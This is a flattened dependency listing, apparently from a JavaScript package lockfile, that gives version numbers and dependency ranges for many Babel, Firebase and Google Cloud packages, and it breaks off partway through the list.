@babel/helper-environment-visitor@^7.22.20 @babel/helper-function-name@^7.23.0 @babel/helper-hoist-variables@^7.22.5 @babel/helper-split-export-declaration@^7.22.6 @babel/parser@^7.23.4 @babel/types@^7.23.4 debug@^4.1.0 globals@^11.1.0 7.23.5 
@babel/code-frame@^7.23.5 @babel/generator@^7.23.5 @babel/helper-environment-visitor@^7.22.20 @babel/helper-function-name@^7.23.0 @babel/helper-hoist-variables@^7.22.5 @babel/helper-split-export-declaration@^7.22.6 @babel/parser@^7.23.5 @babel/types@^7.23.5 debug@^4.1.0 globals@^11.1.0 7.23.6 @babel/code-frame@^7.23.5 @babel/generator@^7.23.6 @babel/helper-environment-visitor@^7.22.20 @babel/helper-function-name@^7.23.0 @babel/helper-hoist-variables@^7.22.5 @babel/helper-split-export-declaration@^7.22.6 @babel/parser@^7.23.6 @babel/types@^7.23.6 debug@^4.3.1 globals@^11.1.0 7.23.7 @babel/code-frame@^7.23.5 @babel/generator@^7.23.6 @babel/helper-environment-visitor@^7.22.20 @babel/helper-function-name@^7.23.0 @babel/helper-hoist-variables@^7.22.5 @babel/helper-split-export-declaration@^7.22.6 @babel/parser@^7.23.6 @babel/types@^7.23.6 debug@^4.3.1 globals@^11.1.0 7.23.9 @babel/code-frame@^7.23.5 @babel/generator@^7.23.6 @babel/helper-environment-visitor@^7.22.20 @babel/helper-function-name@^7.23.0 @babel/helper-hoist-variables@^7.22.5 @babel/helper-split-export-declaration@^7.22.6 @babel/parser@^7.23.9 @babel/types@^7.23.9 debug@^4.3.1 globals@^11.1.0 7.24.0 @babel/code-frame@^7.23.5 @babel/generator@^7.23.6 @babel/helper-environment-visitor@^7.22.20 @babel/helper-function-name@^7.23.0 @babel/helper-hoist-variables@^7.22.5 @babel/helper-split-export-declaration@^7.22.6 @babel/parser@^7.24.0 @babel/types@^7.24.0 debug@^4.3.1 globals@^11.1.0 7.24.1 @babel/code-frame@^7.24.1 @babel/generator@^7.24.1 @babel/helper-environment-visitor@^7.22.20 @babel/helper-function-name@^7.23.0 @babel/helper-hoist-variables@^7.22.5 @babel/helper-split-export-declaration@^7.22.6 @babel/parser@^7.24.1 @babel/types@^7.24.0 debug@^4.3.1 globals@^11.1.0 7.24.5 @babel/code-frame@^7.24.2 @babel/generator@^7.24.5 @babel/helper-environment-visitor@^7.22.20 @babel/helper-function-name@^7.23.0 @babel/helper-hoist-variables@^7.22.5 @babel/helper-split-export-declaration@^7.24.5 
@babel/parser@^7.24.5 @babel/types@^7.24.5 debug@^4.3.1 globals@^11.1.0 7.24.6 @babel/code-frame@^7.24.6 @babel/generator@^7.24.6 @babel/helper-environment-visitor@^7.24.6 @babel/helper-function-name@^7.24.6 @babel/helper-hoist-variables@^7.24.6 @babel/helper-split-export-declaration@^7.24.6 @babel/parser@^7.24.6 @babel/types@^7.24.6 debug@^4.3.1 globals@^11.1.0 7.24.7 @babel/code-frame@^7.24.7 @babel/generator@^7.24.7 @babel/helper-environment-visitor@^7.24.7 @babel/helper-function-name@^7.24.7 @babel/helper-hoist-variables@^7.24.7 @babel/helper-split-export-declaration@^7.24.7 @babel/parser@^7.24.7 @babel/types@^7.24.7 debug@^4.3.1 globals@^11.1.0 7.24.8 @babel/code-frame@^7.24.7 @babel/generator@^7.24.8 @babel/helper-environment-visitor@^7.24.7 @babel/helper-function-name@^7.24.7 @babel/helper-hoist-variables@^7.24.7 @babel/helper-split-export-declaration@^7.24.7 @babel/parser@^7.24.8 @babel/types@^7.24.8 debug@^4.3.1 globals@^11.1.0 7.25.0 @babel/code-frame@^7.24.7 @babel/generator@^7.25.0 @babel/parser@^7.25.0 @babel/template@^7.25.0 @babel/types@^7.25.0 debug@^4.3.1 globals@^11.1.0 7.25.1 @babel/code-frame@^7.24.7 @babel/generator@^7.25.0 @babel/parser@^7.25.0 @babel/template@^7.25.0 @babel/types@^7.25.0 debug@^4.3.1 globals@^11.1.0 7.25.2 @babel/code-frame@^7.24.7 @babel/generator@^7.25.0 @babel/parser@^7.25.0 @babel/template@^7.25.0 @babel/types@^7.25.2 debug@^4.3.1 globals@^11.1.0 7.25.3 @babel/code-frame@^7.24.7 @babel/generator@^7.25.0 @babel/parser@^7.25.3 @babel/template@^7.25.0 @babel/types@^7.25.2 debug@^4.3.1 globals@^11.1.0 7.25.4 @babel/code-frame@^7.24.7 @babel/generator@^7.25.4 @babel/parser@^7.25.4 @babel/template@^7.25.0 @babel/types@^7.25.4 debug@^4.3.1 globals@^11.1.0 7.25.6 @babel/code-frame@^7.24.7 @babel/generator@^7.25.6 @babel/parser@^7.25.6 @babel/template@^7.25.0 @babel/types@^7.25.6 debug@^4.3.1 globals@^11.1.0 7.25.7 @babel/code-frame@^7.25.7 @babel/generator@^7.25.7 @babel/parser@^7.25.7 @babel/template@^7.25.7 @babel/types@^7.25.7 
debug@^4.3.1 globals@^11.1.0 7.25.9 @babel/code-frame@^7.25.9 @babel/generator@^7.25.9 @babel/parser@^7.25.9 @babel/template@^7.25.9 @babel/types@^7.25.9 debug@^4.3.1 globals@^11.1.0 7.26.3 @babel/code-frame@^7.26.2 @babel/generator@^7.26.3 @babel/parser@^7.26.3 @babel/template@^7.25.9 @babel/types@^7.26.3 debug@^4.3.1 globals@^11.1.0 7.26.4 @babel/code-frame@^7.26.2 @babel/generator@^7.26.3 @babel/parser@^7.26.3 @babel/template@^7.25.9 @babel/types@^7.26.3 debug@^4.3.1 globals@^11.1.0 7.26.5 @babel/code-frame@^7.26.2 @babel/generator@^7.26.5 @babel/parser@^7.26.5 @babel/template@^7.25.9 @babel/types@^7.26.5 debug@^4.3.1 globals@^11.1.0 7.26.7 @babel/code-frame@^7.26.2 @babel/generator@^7.26.5 @babel/parser@^7.26.7 @babel/template@^7.25.9 @babel/types@^7.26.7 debug@^4.3.1 globals@^11.1.0 7.26.8 @babel/code-frame@^7.26.2 @babel/generator@^7.26.8 @babel/parser@^7.26.8 @babel/template@^7.26.8 @babel/types@^7.26.8 debug@^4.3.1 globals@^11.1.0 7.26.9 @babel/code-frame@^7.26.2 @babel/generator@^7.26.9 @babel/parser@^7.26.9 @babel/template@^7.26.9 @babel/types@^7.26.9 debug@^4.3.1 globals@^11.1.0 7.26.10 @babel/code-frame@^7.26.2 @babel/generator@^7.26.10 @babel/parser@^7.26.10 @babel/template@^7.26.9 @babel/types@^7.26.10 debug@^4.3.1 globals@^11.1.0 7.27.0 @babel/code-frame@^7.26.2 @babel/generator@^7.27.0 @babel/parser@^7.27.0 @babel/template@^7.27.0 @babel/types@^7.27.0 debug@^4.3.1 globals@^11.1.0 7.27.1 @babel/code-frame@^7.27.1 @babel/generator@^7.27.1 @babel/parser@^7.27.1 @babel/template@^7.27.1 @babel/types@^7.27.1 debug@^4.3.1 globals@^11.1.0 7.27.3 @babel/code-frame@^7.27.1 @babel/generator@^7.27.3 @babel/parser@^7.27.3 @babel/template@^7.27.2 @babel/types@^7.27.3 debug@^4.3.1 globals@^11.1.0 7.27.4 @babel/code-frame@^7.27.1 @babel/generator@^7.27.3 @babel/parser@^7.27.4 @babel/template@^7.27.2 @babel/types@^7.27.3 debug@^4.3.1 globals@^11.1.0 7.27.7 @babel/code-frame@^7.27.1 @babel/generator@^7.27.5 @babel/parser@^7.27.7 @babel/template@^7.27.2 
@babel/types@^7.27.7 debug@^4.3.1 globals@^11.1.0 7.28.0 @babel/code-frame@^7.27.1 @babel/generator@^7.28.0 @babel/helper-globals@^7.28.0 @babel/parser@^7.28.0 @babel/template@^7.27.2 @babel/types@^7.28.0 debug@^4.3.1 7.28.3 @babel/code-frame@^7.27.1 @babel/generator@^7.28.3 @babel/helper-globals@^7.28.0 @babel/parser@^7.28.3 @babel/template@^7.27.2 @babel/types@^7.28.2 debug@^4.3.1 7.28.4 @babel/code-frame@^7.27.1 @babel/generator@^7.28.3 @babel/helper-globals@^7.28.0 @babel/parser@^7.28.4 @babel/template@^7.27.2 @babel/types@^7.28.4 debug@^4.3.1 7.28.5 @babel/code-frame@^7.27.1 @babel/generator@^7.28.5 @babel/helper-globals@^7.28.0 @babel/parser@^7.28.5 @babel/template@^7.27.2 @babel/types@^7.28.5 debug@^4.3.1 @babel/types 7.1.2 esutils@^2.0.2 lodash@^4.17.10 to-fast-properties@^2.0.0 7.6.1 esutils@^2.0.2 lodash@^4.17.13 to-fast-properties@^2.0.0 7.28.5 @babel/helper-string-parser@^7.27.1 @babel/helper-validator-identifier@^7.28.5 @firebase/ai 1.4.1 Scope peer|@firebase/app@0.x @firebase/app-check-interop-types@0.3.3 Scope peer|@firebase/app-types@0.x @firebase/component@0.6.18 @firebase/logger@0.4.4 @firebase/util@1.12.1 tslib@^2.1.0 @firebase/analytics 0.6.18 @firebase/analytics-types@0.6.0 Scope peer|@firebase/app@0.x Scope peer|@firebase/app-types@0.x @firebase/component@0.5.6 @firebase/installations@0.4.32 @firebase/logger@0.2.6 @firebase/util@1.3.0 tslib@^2.1.0 0.10.0 Scope peer|@firebase/app@0.x @firebase/component@0.6.4 @firebase/installations@0.6.4 @firebase/logger@0.4.0 @firebase/util@1.9.3 tslib@^2.1.0 0.10.8 Scope peer|@firebase/app@0.x @firebase/component@0.6.9 @firebase/installations@0.6.9 @firebase/logger@0.4.2 @firebase/util@1.10.0 tslib@^2.1.0 0.10.17 Scope peer|@firebase/app@0.x @firebase/component@0.6.18 @firebase/installations@0.6.18 @firebase/logger@0.4.4 @firebase/util@1.12.1 tslib@^2.1.0 @firebase/analytics-compat 0.2.6 @firebase/analytics@0.10.0 @firebase/analytics-types@0.8.0 Scope peer|@firebase/app-compat@0.x @firebase/component@0.6.4 
@firebase/util@1.9.3 tslib@^2.1.0 0.2.14 @firebase/analytics@0.10.8 @firebase/analytics-types@0.8.2 Scope peer|@firebase/app-compat@0.x @firebase/component@0.6.9 @firebase/util@1.10.0 tslib@^2.1.0 0.2.23 @firebase/analytics@0.10.17 @firebase/analytics-types@0.8.3 Scope peer|@firebase/app-compat@0.x @firebase/component@0.6.18 @firebase/util@1.12.1 tslib@^2.1.0 @firebase/analytics-types 0.6.0 0.8.0 0.8.2 0.8.3 @firebase/app 0.6.30 @firebase/app-types@0.6.3 @firebase/component@0.5.6 @firebase/logger@0.2.6 @firebase/util@1.3.0 dom-storage@2.1.0 tslib@^2.1.0 xmlhttprequest@1.8.0 0.9.13 @firebase/component@0.6.4 @firebase/logger@0.4.0 @firebase/util@1.9.3 idb@7.1.1 tslib@^2.1.0 0.10.13 @firebase/component@0.6.9 @firebase/logger@0.4.2 @firebase/util@1.10.0 idb@7.1.1 tslib@^2.1.0 0.13.2 @firebase/component@0.6.18 @firebase/logger@0.4.4 @firebase/util@1.12.1 idb@7.1.1 tslib@^2.1.0 @firebase/app-check 0.3.2 Scope peer|@firebase/app@0.x @firebase/app-check-interop-types@0.1.0 @firebase/app-check-types@0.3.1 Scope peer|@firebase/app-types@0.x @firebase/component@0.5.6 @firebase/logger@0.2.6 @firebase/util@1.3.0 tslib@^2.1.0 0.8.0 Scope peer|@firebase/app@0.x @firebase/component@0.6.4 @firebase/logger@0.4.0 @firebase/util@1.9.3 tslib@^2.1.0 0.8.8 Scope peer|@firebase/app@0.x @firebase/component@0.6.9 @firebase/logger@0.4.2 @firebase/util@1.10.0 tslib@^2.1.0 0.10.1 Scope peer|@firebase/app@0.x @firebase/component@0.6.18 @firebase/logger@0.4.4 @firebase/util@1.12.1 tslib@^2.1.0 @firebase/app-check-compat 0.3.7 @firebase/app-check@0.8.0 @firebase/app-check-types@0.5.0 Scope peer|@firebase/app-compat@0.x @firebase/component@0.6.4 @firebase/logger@0.4.0 @firebase/util@1.9.3 tslib@^2.1.0 0.3.15 @firebase/app-check@0.8.8 @firebase/app-check-types@0.5.2 Scope peer|@firebase/app-compat@0.x @firebase/component@0.6.9 @firebase/logger@0.4.2 @firebase/util@1.10.0 tslib@^2.1.0 0.3.26 @firebase/app-check@0.10.1 @firebase/app-check-types@0.5.3 Scope peer|@firebase/app-compat@0.x 
@firebase/component@0.6.18 @firebase/logger@0.4.4 @firebase/util@1.12.1 tslib@^2.1.0 @firebase/app-check-interop-types 0.1.0 0.3.0 0.3.2 0.3.3 @firebase/app-check-types 0.3.1 0.5.0 0.5.2 0.5.3 @firebase/app-compat 0.2.13 @firebase/app@0.9.13 @firebase/component@0.6.4 @firebase/logger@0.4.0 @firebase/util@1.9.3 tslib@^2.1.0 0.2.43 @firebase/app@0.10.13 @firebase/component@0.6.9 @firebase/logger@0.4.2 @firebase/util@1.10.0 tslib@^2.1.0 0.4.2 @firebase/app@0.13.2 @firebase/component@0.6.18 @firebase/logger@0.4.4 @firebase/util@1.12.1 tslib@^2.1.0 @firebase/app-types 0.6.3 0.9.0 0.9.2 0.9.3 @firebase/auth 0.16.8 Scope peer|@firebase/app@0.x @firebase/auth-types@0.10.3 0.23.2 Scope peer|@firebase/app@0.x @firebase/component@0.6.4 @firebase/logger@0.4.0 @firebase/util@1.9.3 node-fetch@2.6.7 tslib@^2.1.0 1.7.9 Scope peer|@firebase/app@0.x @firebase/component@0.6.9 @firebase/logger@0.4.2 @firebase/util@1.10.0 Scope peer|@react-native-async-storage/async-storage@^1.18.1 tslib@^2.1.0 undici@6.19.7 1.10.8 Scope peer|@firebase/app@0.x @firebase/component@0.6.18 @firebase/logger@0.4.4 @firebase/util@1.12.1 Scope peer|@react-native-async-storage/async-storage@^1.18.1 tslib@^2.1.0 @firebase/auth-compat 0.4.2 Scope peer|@firebase/app-compat@0.x @firebase/auth@0.23.2 @firebase/auth-types@0.12.0 @firebase/component@0.6.4 @firebase/util@1.9.3 node-fetch@2.6.7 tslib@^2.1.0 0.5.14 Scope peer|@firebase/app-compat@0.x @firebase/auth@1.7.9 @firebase/auth-types@0.12.2 @firebase/component@0.6.9 @firebase/util@1.10.0 tslib@^2.1.0 undici@6.19.7 0.5.28 Scope peer|@firebase/app-compat@0.x @firebase/auth@1.10.8 @firebase/auth-types@0.13.0 @firebase/component@0.6.18 @firebase/util@1.12.1 tslib@^2.1.0 @firebase/auth-interop-types 0.1.6 Scope peer|@firebase/app-types@0.x Scope peer|@firebase/util@1.x 0.2.1 0.2.3 0.2.4 @firebase/auth-types 0.10.3 Scope peer|@firebase/app-types@0.x Scope peer|@firebase/util@1.x 0.12.0 Scope peer|@firebase/app-types@0.x Scope peer|@firebase/util@1.x 0.12.2 Scope 
peer|@firebase/app-types@0.x Scope peer|@firebase/util@1.x 0.13.0 Scope peer|@firebase/app-types@0.x Scope peer|@firebase/util@1.x @firebase/component 0.5.6 @firebase/util@1.3.0 tslib@^2.1.0 0.6.4 @firebase/util@1.9.3 tslib@^2.1.0 0.6.9 @firebase/util@1.10.0 tslib@^2.1.0 0.6.18 @firebase/util@1.12.1 tslib@^2.1.0 @firebase/data-connect 0.1.0 Scope peer|@firebase/app@0.x @firebase/auth-interop-types@0.2.3 @firebase/component@0.6.9 @firebase/logger@0.4.2 @firebase/util@1.10.0 tslib@^2.1.0 0.3.10 Scope peer|@firebase/app@0.x @firebase/auth-interop-types@0.2.4 @firebase/component@0.6.18 @firebase/logger@0.4.4 @firebase/util@1.12.1 tslib@^2.1.0 @firebase/database 0.11.0 @firebase/auth-interop-types@0.1.6 @firebase/component@0.5.6 @firebase/database-types@0.8.0 @firebase/logger@0.2.6 @firebase/util@1.3.0 faye-websocket@0.11.3 tslib@^2.1.0 0.14.4 @firebase/auth-interop-types@0.2.1 @firebase/component@0.6.4 @firebase/logger@0.4.0 @firebase/util@1.9.3 faye-websocket@0.11.4 tslib@^2.1.0 1.0.8 @firebase/app-check-interop-types@0.3.2 @firebase/auth-interop-types@0.2.3 @firebase/component@0.6.9 @firebase/logger@0.4.2 @firebase/util@1.10.0 faye-websocket@0.11.4 tslib@^2.1.0 1.0.20 @firebase/app-check-interop-types@0.3.3 @firebase/auth-interop-types@0.2.4 @firebase/component@0.6.18 @firebase/logger@0.4.4 @firebase/util@1.12.1 faye-websocket@0.11.4 tslib@^2.1.0 @firebase/database-compat 0.3.4 @firebase/component@0.6.4 @firebase/database@0.14.4 @firebase/database-types@0.10.4 @firebase/logger@0.4.0 @firebase/util@1.9.3 tslib@^2.1.0 1.0.8 @firebase/component@0.6.9 @firebase/database@1.0.8 @firebase/database-types@1.0.5 @firebase/logger@0.4.2 @firebase/util@1.10.0 tslib@^2.1.0 2.0.11 @firebase/component@0.6.18 @firebase/database@1.0.20 @firebase/database-types@1.0.15 @firebase/logger@0.4.4 @firebase/util@1.12.1 tslib@^2.1.0 @firebase/database-types 0.8.0 @firebase/app-types@0.6.3 @firebase/util@1.3.0 0.10.4 @firebase/app-types@0.9.0 @firebase/util@1.9.3 1.0.5 @firebase/app-types@0.9.2 
@firebase/util@1.10.0 1.0.15 @firebase/app-types@0.9.3 @firebase/util@1.12.1 @firebase/firestore 2.4.0 Scope peer|@firebase/app@0.x Scope peer|@firebase/app-types@0.x @firebase/component@0.5.6 @firebase/firestore-types@2.4.0 @firebase/logger@0.2.6 @firebase/util@1.3.0 @firebase/webchannel-wrapper@0.5.1 @grpc/grpc-js@^1.3.2 @grpc/proto-loader@^0.6.0 node-fetch@2.6.1 tslib@^2.1.0 2.4.1 Scope peer|@firebase/app@0.x Scope peer|@firebase/app-types@0.x @firebase/component@0.5.6 @firebase/firestore-types@2.4.0 @firebase/logger@0.2.6 @firebase/util@1.3.0 @firebase/webchannel-wrapper@0.5.1 @grpc/grpc-js@^1.3.2 @grpc/proto-loader@^0.6.0 node-fetch@2.6.7 tslib@^2.1.0 3.13.0 Scope peer|@firebase/app@0.x @firebase/component@0.6.4 @firebase/logger@0.4.0 @firebase/util@1.9.3 @firebase/webchannel-wrapper@0.10.1 @grpc/grpc-js@~1.7.0 @grpc/proto-loader@^0.6.13 node-fetch@2.6.7 tslib@^2.1.0 4.7.3 Scope peer|@firebase/app@0.x @firebase/component@0.6.9 @firebase/logger@0.4.2 @firebase/util@1.10.0 @firebase/webchannel-wrapper@1.0.1 @grpc/grpc-js@~1.9.0 @grpc/proto-loader@^0.7.8 tslib@^2.1.0 undici@6.19.7 4.8.0 Scope peer|@firebase/app@0.x @firebase/component@0.6.18 @firebase/logger@0.4.4 @firebase/util@1.12.1 @firebase/webchannel-wrapper@1.0.3 @grpc/grpc-js@~1.9.0 @grpc/proto-loader@^0.7.8 tslib@^2.1.0 @firebase/firestore-compat 0.3.12 Scope peer|@firebase/app-compat@0.x @firebase/component@0.6.4 @firebase/firestore@3.13.0 @firebase/firestore-types@2.5.1 @firebase/util@1.9.3 tslib@^2.1.0 0.3.38 Scope peer|@firebase/app-compat@0.x @firebase/component@0.6.9 @firebase/firestore@4.7.3 @firebase/firestore-types@3.0.2 @firebase/util@1.10.0 tslib@^2.1.0 0.3.53 Scope peer|@firebase/app-compat@0.x @firebase/component@0.6.18 @firebase/firestore@4.8.0 @firebase/firestore-types@3.0.3 @firebase/util@1.12.1 tslib@^2.1.0 @firebase/firestore-types 2.4.0 Scope peer|@firebase/app-types@0.x Scope peer|@firebase/util@1.x 2.5.1 Scope peer|@firebase/app-types@0.x Scope peer|@firebase/util@1.x 3.0.2 Scope 
peer|@firebase/app-types@0.x Scope peer|@firebase/util@1.x 3.0.3 Scope peer|@firebase/app-types@0.x Scope peer|@firebase/util@1.x @firebase/functions 0.6.15 Scope peer|@firebase/app@0.x Scope peer|@firebase/app-types@0.x @firebase/component@0.5.6 @firebase/functions-types@0.4.0 @firebase/messaging-types@0.5.0 node-fetch@2.6.1 tslib@^2.1.0 0.6.16 Scope peer|@firebase/app@0.x Scope peer|@firebase/app-types@0.x @firebase/component@0.5.6 @firebase/functions-types@0.4.0 @firebase/messaging-types@0.5.0 node-fetch@2.6.7 tslib@^2.1.0 0.10.0 Scope peer|@firebase/app@0.x @firebase/app-check-interop-types@0.3.0 @firebase/auth-interop-types@0.2.1 @firebase/component@0.6.4 @firebase/messaging-interop-types@0.2.0 @firebase/util@1.9.3 node-fetch@2.6.7 tslib@^2.1.0 0.11.8 Scope peer|@firebase/app@0.x @firebase/app-check-interop-types@0.3.2 @firebase/auth-interop-types@0.2.3 @firebase/component@0.6.9 @firebase/messaging-interop-types@0.2.2 @firebase/util@1.10.0 tslib@^2.1.0 undici@6.19.7 0.12.9 Scope peer|@firebase/app@0.x @firebase/app-check-interop-types@0.3.3 @firebase/auth-interop-types@0.2.4 @firebase/component@0.6.18 @firebase/messaging-interop-types@0.2.3 @firebase/util@1.12.1 tslib@^2.1.0 @firebase/functions-compat 0.3.5 Scope peer|@firebase/app-compat@0.x @firebase/component@0.6.4 @firebase/functions@0.10.0 @firebase/functions-types@0.6.0 @firebase/util@1.9.3 tslib@^2.1.0 0.3.14 Scope peer|@firebase/app-compat@0.x @firebase/component@0.6.9 @firebase/functions@0.11.8 @firebase/functions-types@0.6.2 @firebase/util@1.10.0 tslib@^2.1.0 0.3.26 Scope peer|@firebase/app-compat@0.x @firebase/component@0.6.18 @firebase/functions@0.12.9 @firebase/functions-types@0.6.3 @firebase/util@1.12.1 tslib@^2.1.0 @firebase/functions-types 0.4.0 0.6.0 0.6.2 0.6.3 @firebase/installations 0.4.32 Scope peer|@firebase/app@0.x Scope peer|@firebase/app-types@0.x @firebase/component@0.5.6 @firebase/installations-types@0.3.4 @firebase/util@1.3.0 idb@3.0.2 tslib@^2.1.0 0.6.4 Scope peer|@firebase/app@0.x 
@firebase/component@0.6.4 @firebase/util@1.9.3 idb@7.0.1 tslib@^2.1.0 0.6.9 Scope peer|@firebase/app@0.x @firebase/component@0.6.9 @firebase/util@1.10.0 idb@7.1.1 tslib@^2.1.0 0.6.18 Scope peer|@firebase/app@0.x @firebase/component@0.6.18 @firebase/util@1.12.1 idb@7.1.1 tslib@^2.1.0 @firebase/installations-compat 0.2.4 Scope peer|@firebase/app-compat@0.x @firebase/component@0.6.4 @firebase/installations@0.6.4 @firebase/installations-types@0.5.0 @firebase/util@1.9.3 tslib@^2.1.0 0.2.9 Scope peer|@firebase/app-compat@0.x @firebase/component@0.6.9 @firebase/installations@0.6.9 @firebase/installations-types@0.5.2 @firebase/util@1.10.0 tslib@^2.1.0 0.2.18 Scope peer|@firebase/app-compat@0.x @firebase/component@0.6.18 @firebase/installations@0.6.18 @firebase/installations-types@0.5.3 @firebase/util@1.12.1 tslib@^2.1.0 @firebase/installations-types 0.3.4 Scope peer|@firebase/app-types@0.x 0.5.0 Scope peer|@firebase/app-types@0.x 0.5.2 Scope peer|@firebase/app-types@0.x 0.5.3 Scope peer|@firebase/app-types@0.x @firebase/logger 0.2.6 0.4.0 tslib@^2.1.0 0.4.2 tslib@^2.1.0 0.4.4 tslib@^2.1.0 @firebase/messaging 0.8.0 Scope peer|@firebase/app@0.x Scope peer|@firebase/app-types@0.x @firebase/component@0.5.6 @firebase/installations@0.4.32 @firebase/messaging-types@0.5.0 @firebase/util@1.3.0 idb@3.0.2 tslib@^2.1.0 0.12.4 Scope peer|@firebase/app@0.x @firebase/component@0.6.4 @firebase/installations@0.6.4 @firebase/messaging-interop-types@0.2.0 @firebase/util@1.9.3 idb@7.0.1 tslib@^2.1.0 0.12.12 Scope peer|@firebase/app@0.x @firebase/component@0.6.9 @firebase/installations@0.6.9 @firebase/messaging-interop-types@0.2.2 @firebase/util@1.10.0 idb@7.1.1 tslib@^2.1.0 0.12.22 Scope peer|@firebase/app@0.x @firebase/component@0.6.18 @firebase/installations@0.6.18 @firebase/messaging-interop-types@0.2.3 @firebase/util@1.12.1 idb@7.1.1 tslib@^2.1.0 @firebase/messaging-compat 0.2.4 Scope peer|@firebase/app-compat@0.x @firebase/component@0.6.4 @firebase/messaging@0.12.4 @firebase/util@1.9.3 
tslib@^2.1.0 0.2.12 Scope peer|@firebase/app-compat@0.x @firebase/component@0.6.9 @firebase/messaging@0.12.12 @firebase/util@1.10.0 tslib@^2.1.0 0.2.22 Scope peer|@firebase/app-compat@0.x @firebase/component@0.6.18 @firebase/messaging@0.12.22 @firebase/util@1.12.1 tslib@^2.1.0 @firebase/messaging-interop-types 0.2.0 0.2.2 0.2.3 @firebase/messaging-types 0.5.0 Scope peer|@firebase/app-types@0.x @firebase/performance 0.4.18 Scope peer|@firebase/app@0.x Scope peer|@firebase/app-types@0.x @firebase/component@0.5.6 @firebase/installations@0.4.32 @firebase/logger@0.2.6 @firebase/performance-types@0.0.13 @firebase/util@1.3.0 tslib@^2.1.0 0.6.4 Scope peer|@firebase/app@0.x @firebase/component@0.6.4 @firebase/installations@0.6.4 @firebase/logger@0.4.0 @firebase/util@1.9.3 tslib@^2.1.0 0.6.9 Scope peer|@firebase/app@0.x @firebase/component@0.6.9 @firebase/installations@0.6.9 @firebase/logger@0.4.2 @firebase/util@1.10.0 tslib@^2.1.0 0.7.7 Scope peer|@firebase/app@0.x @firebase/component@0.6.18 @firebase/installations@0.6.18 @firebase/logger@0.4.4 @firebase/util@1.12.1 tslib@^2.1.0 web-vitals@^4.2.4 @firebase/performance-compat 0.2.4 Scope peer|@firebase/app-compat@0.x @firebase/component@0.6.4 @firebase/logger@0.4.0 @firebase/performance@0.6.4 @firebase/performance-types@0.2.0 @firebase/util@1.9.3 tslib@^2.1.0 0.2.9 Scope peer|@firebase/app-compat@0.x @firebase/component@0.6.9 @firebase/logger@0.4.2 @firebase/performance@0.6.9 @firebase/performance-types@0.2.2 @firebase/util@1.10.0 tslib@^2.1.0 0.2.20 Scope peer|@firebase/app-compat@0.x @firebase/component@0.6.18 @firebase/logger@0.4.4 @firebase/performance@0.7.7 @firebase/performance-types@0.2.3 @firebase/util@1.12.1 tslib@^2.1.0 @firebase/performance-types 0.0.13 0.2.0 0.2.2 0.2.3 @firebase/polyfill 0.3.36 core-js@3.6.5 promise-polyfill@8.1.3 whatwg-fetch@2.0.4 @firebase/remote-config 0.1.43 Scope peer|@firebase/app@0.x Scope peer|@firebase/app-types@0.x @firebase/component@0.5.6 @firebase/installations@0.4.32 
@firebase/logger@0.2.6 @firebase/remote-config-types@0.1.9 @firebase/util@1.3.0 tslib@^2.1.0 0.4.4 Scope peer|@firebase/app@0.x @firebase/component@0.6.4 @firebase/installations@0.6.4 @firebase/logger@0.4.0 @firebase/util@1.9.3 tslib@^2.1.0 0.4.9 Scope peer|@firebase/app@0.x @firebase/component@0.6.9 @firebase/installations@0.6.9 @firebase/logger@0.4.2 @firebase/util@1.10.0 tslib@^2.1.0 0.6.5 Scope peer|@firebase/app@0.x @firebase/component@0.6.18 @firebase/installations@0.6.18 @firebase/logger@0.4.4 @firebase/util@1.12.1 tslib@^2.1.0 @firebase/remote-config-compat 0.2.4 Scope peer|@firebase/app-compat@0.x @firebase/component@0.6.4 @firebase/logger@0.4.0 @firebase/remote-config@0.4.4 @firebase/remote-config-types@0.3.0 @firebase/util@1.9.3 tslib@^2.1.0 0.2.9 Scope peer|@firebase/app-compat@0.x @firebase/component@0.6.9 @firebase/logger@0.4.2 @firebase/remote-config@0.4.9 @firebase/remote-config-types@0.3.2 @firebase/util@1.10.0 tslib@^2.1.0 0.2.18 Scope peer|@firebase/app-compat@0.x @firebase/component@0.6.18 @firebase/logger@0.4.4 @firebase/remote-config@0.6.5 @firebase/remote-config-types@0.4.0 @firebase/util@1.12.1 tslib@^2.1.0 @firebase/remote-config-types 0.1.9 0.3.0 0.3.2 0.4.0 @firebase/storage 0.7.0 Scope peer|@firebase/app@0.x Scope peer|@firebase/app-types@0.x @firebase/component@0.5.6 @firebase/storage-types@0.5.0 @firebase/util@1.3.0 node-fetch@2.6.1 tslib@^2.1.0 0.7.1 Scope peer|@firebase/app@0.x Scope peer|@firebase/app-types@0.x @firebase/component@0.5.6 @firebase/storage-types@0.5.0 @firebase/util@1.3.0 node-fetch@2.6.7 tslib@^2.1.0 0.11.2 Scope peer|@firebase/app@0.x @firebase/component@0.6.4 @firebase/util@1.9.3 node-fetch@2.6.7 tslib@^2.1.0 0.13.2 Scope peer|@firebase/app@0.x @firebase/component@0.6.9 @firebase/util@1.10.0 tslib@^2.1.0 undici@6.19.7 0.13.14 Scope peer|@firebase/app@0.x @firebase/component@0.6.18 @firebase/util@1.12.1 tslib@^2.1.0 @firebase/storage-compat 0.3.2 Scope peer|@firebase/app-compat@0.x @firebase/component@0.6.4 
@firebase/storage@0.11.2 @firebase/storage-types@0.8.0 @firebase/util@1.9.3 tslib@^2.1.0 0.3.12 Scope peer|@firebase/app-compat@0.x @firebase/component@0.6.9 @firebase/storage@0.13.2 @firebase/storage-types@0.8.2 @firebase/util@1.10.0 tslib@^2.1.0 0.3.24 Scope peer|@firebase/app-compat@0.x @firebase/component@0.6.18 @firebase/storage@0.13.14 @firebase/storage-types@0.8.3 @firebase/util@1.12.1 tslib@^2.1.0 @firebase/storage-types 0.5.0 Scope peer|@firebase/app-types@0.x Scope peer|@firebase/util@1.x 0.8.0 Scope peer|@firebase/app-types@0.x Scope peer|@firebase/util@1.x 0.8.2 Scope peer|@firebase/app-types@0.x Scope peer|@firebase/util@1.x 0.8.3 Scope peer|@firebase/app-types@0.x Scope peer|@firebase/util@1.x @firebase/util 1.3.0 tslib@^2.1.0 1.9.3 tslib@^2.1.0 1.10.0 tslib@^2.1.0 1.12.1 tslib@^2.1.0 @firebase/vertexai-preview 0.0.4 Scope peer|@firebase/app@0.x @firebase/app-check-interop-types@0.3.2 Scope peer|@firebase/app-types@0.x @firebase/component@0.6.9 @firebase/logger@0.4.2 @firebase/util@1.10.0 tslib@^2.1.0 @firebase/webchannel-wrapper 0.5.1 0.10.1 1.0.1 1.0.3 @google-cloud/cloudbuild 2.6.0 google-gax@^2.24.1 3.10.0 google-gax@^3.5.8 4.8.1 google-gax@^4.0.3 @google-cloud/common 3.8.0 @google-cloud/projectify@^2.0.0 @google-cloud/promisify@^2.0.0 arrify@^2.0.1 